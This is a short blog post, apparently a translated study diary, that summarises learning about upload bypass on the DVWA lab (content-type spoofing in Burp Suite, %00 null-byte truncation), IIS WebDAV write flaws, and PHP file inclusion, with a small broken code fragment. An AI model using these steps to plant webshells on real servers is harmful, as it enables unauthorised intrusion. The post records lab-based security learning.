March 31, 2016 Infiltration learning summary

Today, a new study of three vulnerabilities, one is truncated upload, one is the IIS Write permission vulnerability, there is a PHP file contains a vulnerability.

Truncation upload: Learning to truncate upload needs to build a DVWA vulnerability test platform, directly downloaded from the Internet can be. Open Dvwa website, there is a uplode of an upload, three kinds of difficulty, you can choose, low-level is, upload any type of file can be, the server will not filter files, for such a site, we can directly upload a PHP trojan, and then use a kitchen knife connection can. Intermediate difficulty is that the site will be uploaded to the file type of judgment, if not meet the specified file type, the file will not be uploaded, this time will be used Burpsuite grab the package to modify the type of file and then upload this will be successful. Advanced difficulty is that the site will upload the file name of the last extension to verify, if not meet the upload type, you can not upload, it is necessary to use the 00 truncation upload, first with burpsuite grab, will filenam after the file name only enough plus (space. jpg) JPG is the type of site allow upload, in the go to Hex view hex, the space of 16 in the form of%20 changed to%00, and then send out the package, so that the file can be successfully uploaded.

IIS Write Permissions Vulnerability: The vulnerability is due to the fact that WebDAV is turned on, and the site has write-writable permissions. This time can use Guilin Veteran's two tools Iisputscaner and IIS Write permission to use, to upload files, the vulnerability only iis6.0 and the following server has, the other is not, because the vulnerability is older, so it is not detailed said.

PHP file contains a vulnerability: the principle is that the PHP site has a section of such code:

Include (' a.jpg ');//jpg
$page =$_get[' include ';
Include ($page);

It can receive from the URL address passed the file parameters, and this file is a PHP trojan, this is equivalent to the server to upload files, if it is a word of the Trojan can be connected with a chopper, if it is big horse can be opened directly with the browser, so that the file contains the exploit of the vulnerability.

This loophole only learned the principle today, has not learned concrete how to use, so can only say so much.

(The day After Tomorrow is the Qingming Festival holiday, I will go home tomorrow, so the holiday these days will not be written.) Hope to see a lot of friends to make suggestions, a lot of care, thank you!!! ）

This article is from the "Xiao Yu" blog, please be sure to keep this source http://791120766.blog.51cto.com/10836248/1759039

March 31, 2016 Infiltration learning summary